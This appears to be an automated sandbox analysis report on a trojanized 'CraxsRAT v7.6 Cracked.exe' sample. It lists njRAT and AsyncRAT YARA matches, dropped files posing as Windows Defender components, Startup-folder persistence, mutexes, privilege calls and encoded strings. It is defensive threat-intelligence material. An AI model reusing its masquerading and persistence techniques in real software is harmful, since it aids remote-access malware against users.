Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Creates files with lurking names (e.g. Crack.exe)

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\CraxsRAT v7.6 Cracked.exe.log

Jump to behavior

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 2_2_05973172 NtQuerySystemInformation,		2_2_05973172
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 2_2_05973137 NtQuerySystemInformation,		2_2_05973137

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 2_2_052032D1	2_2_052032D1
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F2AAA2	10_2_00007FF848F2AAA2
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F216C9	10_2_00007FF848F216C9
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F23069	10_2_00007FF848F23069
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F29CF6	10_2_00007FF848F29CF6
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F22065	10_2_00007FF848F22065
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Code function: 10_2_00007FF848F284CD	10_2_00007FF848F284CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FF8490030E9	16_2_00007FF8490030E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_00007FF8490130E9	21_2_00007FF8490130E9
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Code function: 27_2_00007FF848F216C9	27_2_00007FF848F216C9
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Code function: 27_2_00007FF848F22065	27_2_00007FF848F22065
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Code function: 27_2_00007FF848F20E78	27_2_00007FF848F20E78

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\CraxsRat.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1864 -s 800

Sample file is different than original file name gathered from version info

Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2493555663.00000000063FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemscorwks.dllT vs CraxsRAT v7.6 Cracked.exe
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2493555663.0000000006469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWindows Defender Notification.exe4 vs CraxsRAT v7.6 Cracked.exe
Source: CraxsRAT v7.6 Cracked.exe, 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWindows Defender Notification.exe4 vs CraxsRAT v7.6 Cracked.exe

Uses 32bit PE files

Source: CraxsRAT v7.6 Cracked.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.0.Windows Defender Real Time Protection.exe.a30000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 10.0.Windows Defender Notification.exe.410000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.CraxsRAT v7.6 Cracked.exe.82eb818.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0000000A.00000000.2480522494.0000000000412000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000002.00000000.2145187329.0000000000A32000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 00000000.00000002.2500469430.00000000082E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0e75fed00639ea9e725255499292dcdd.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe, type: DROPPED	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: Windows Defender Notification.exe.0.dr, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.0.dr, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.0.dr, qOI2DzwDff.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, qOI2DzwDff.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.10.dr, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.10.dr, wBRYVJsNSz.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender Notification.exe.10.dr, qOI2DzwDff.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Windows Defender Notification.exe.0.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	Base64 encoded string: 'z0k3n8d1QlUZGj3/Cw1MZ+Sw+8GjoHfNJw1IRh/u2EpEdamH0Ve2KpMLNwdldO2r'
Source: Windows Defender Notification.exe.0.dr, v9OXbFpunZ.cs	Base64 encoded string: 'vOBBMYMUH8sucMy888qB2DdntvpAdH5URgoTARCBSmHmA8MkkDwATtXXaAq4', 'NxuMXrNpv8NXvjjtOnSScCtqQ8ImvaIcYArBQI5IsuEb0lAFltxuUWw750Fe', 'tul8KtZrrFOs73ToEDoTBGOG4YivFvgqzkMBk0KJeqsq4T4rvZD9BuCdkwQs'
Source: Windows Defender Notification.exe.0.dr, wBRYVJsNSz.cs	Base64 encoded string: 'HtkKqyCCsGWMASdhGkmxdDP3BxUAN6ARue1FetEchV96k6ucc359MjKQZNYu', 'ZGzFiZEYbw8AsAyCrYf5iLnuDKEdHoOuT1wvadV0Q6TsPWGgrnV911YKPsYA', 'GftXmTDBsrj9eCYbvqyANgNa2J2Wabih1I8Pyih7ulxhttw9tco895BrGXAx', 'rqm406mpFaUeteuc2H0ywSCUnJlpAkADtWOsVAINusYpU6j8DIEv8Lm0977Q', 'JN2jWVD6XxE1StJLoqJB7Hy4pGJ9DdLSpjgzAlnawFgbuiVVenyozhHJQgfY', 'IZsk0shZ2ek0hzaUPhkriuJhbMRFXviCw7i25OfNrfge3CGvoAaeZpN314aC'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	Base64 encoded string: 'z0k3n8d1QlUZGj3/Cw1MZ+Sw+8GjoHfNJw1IRh/u2EpEdamH0Ve2KpMLNwdldO2r'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, v9OXbFpunZ.cs	Base64 encoded string: 'vOBBMYMUH8sucMy888qB2DdntvpAdH5URgoTARCBSmHmA8MkkDwATtXXaAq4', 'NxuMXrNpv8NXvjjtOnSScCtqQ8ImvaIcYArBQI5IsuEb0lAFltxuUWw750Fe', 'tul8KtZrrFOs73ToEDoTBGOG4YivFvgqzkMBk0KJeqsq4T4rvZD9BuCdkwQs'
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, wBRYVJsNSz.cs	Base64 encoded string: 'HtkKqyCCsGWMASdhGkmxdDP3BxUAN6ARue1FetEchV96k6ucc359MjKQZNYu', 'ZGzFiZEYbw8AsAyCrYf5iLnuDKEdHoOuT1wvadV0Q6TsPWGgrnV911YKPsYA', 'GftXmTDBsrj9eCYbvqyANgNa2J2Wabih1I8Pyih7ulxhttw9tco895BrGXAx', 'rqm406mpFaUeteuc2H0ywSCUnJlpAkADtWOsVAINusYpU6j8DIEv8Lm0977Q', 'JN2jWVD6XxE1StJLoqJB7Hy4pGJ9DdLSpjgzAlnawFgbuiVVenyozhHJQgfY', 'IZsk0shZ2ek0hzaUPhkriuJhbMRFXviCw7i25OfNrfge3CGvoAaeZpN314aC'
Source: Windows Defender Notification.exe.10.dr, SCU1sXZDAhlrOPM0WBTbCT6U401XmEe0LB4W5wx8pS6XkBu1wGQdInjDtuZGYUBmQU64igUS65OZVUm7mAK.cs	Base64 encoded string: 'z0k3n8d1QlUZGj3/Cw1MZ+Sw+8GjoHfNJw1IRh/u2EpEdamH0Ve2KpMLNwdldO2r'
Source: Windows Defender Notification.exe.10.dr, v9OXbFpunZ.cs	Base64 encoded string: 'vOBBMYMUH8sucMy888qB2DdntvpAdH5URgoTARCBSmHmA8MkkDwATtXXaAq4', 'NxuMXrNpv8NXvjjtOnSScCtqQ8ImvaIcYArBQI5IsuEb0lAFltxuUWw750Fe', 'tul8KtZrrFOs73ToEDoTBGOG4YivFvgqzkMBk0KJeqsq4T4rvZD9BuCdkwQs'
Source: Windows Defender Notification.exe.10.dr, wBRYVJsNSz.cs	Base64 encoded string: 'HtkKqyCCsGWMASdhGkmxdDP3BxUAN6ARue1FetEchV96k6ucc359MjKQZNYu', 'ZGzFiZEYbw8AsAyCrYf5iLnuDKEdHoOuT1wvadV0Q6TsPWGgrnV911YKPsYA', 'GftXmTDBsrj9eCYbvqyANgNa2J2Wabih1I8Pyih7ulxhttw9tco895BrGXAx', 'rqm406mpFaUeteuc2H0ywSCUnJlpAkADtWOsVAINusYpU6j8DIEv8Lm0977Q', 'JN2jWVD6XxE1StJLoqJB7Hy4pGJ9DdLSpjgzAlnawFgbuiVVenyozhHJQgfY', 'IZsk0shZ2ek0hzaUPhkriuJhbMRFXviCw7i25OfNrfge3CGvoAaeZpN314aC'

Source: Windows Defender Notification.exe.10.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Windows Defender Notification.exe.10.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.CraxsRAT v7.6 Cracked.exe.8326b40.0.raw.unpack, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Windows Defender Notification.exe.0.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Windows Defender Notification.exe.0.dr, ynIzlnuLf7CPqJ1BqXfA9SifzeiCYdouJCr4zuMmzgV3raLPtUbRrgeldhTd9tRcD9htPWOsdhrXPxER093.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.spre.phis.troj.adwa.spyw.evad.winEXE@30/32@0/1

Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 2_2_05970032 AdjustTokenPrivileges,	2_2_05970032
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 2_2_05970006 AdjustTokenPrivileges,	2_2_05970006
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 7_2_015EB1EE AdjustTokenPrivileges,	7_2_015EB1EE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 7_2_015EB1B7 AdjustTokenPrivileges,	7_2_015EB1B7
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 8_2_010FB1EE AdjustTokenPrivileges,	8_2_010FB1EE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 8_2_010FB1B7 AdjustTokenPrivileges,	8_2_010FB1B7
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 11_2_0109B1EE AdjustTokenPrivileges,	11_2_0109B1EE
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Code function: 11_2_0109B1B7 AdjustTokenPrivileges,	11_2_0109B1B7

Source: C:\Users\user\Desktop\CraxsRAT v7.6 Cracked.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\CraxsRAT v7.6 Cracked.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Windows Defender Notification.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Notification.exe	Mutant created: \Sessions\1\BaseNamedObjects\pqN2WFRab1fxKZOt
Source: C:\Users\user\AppData\Local\Temp\Windows Defender Real Time Protection.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
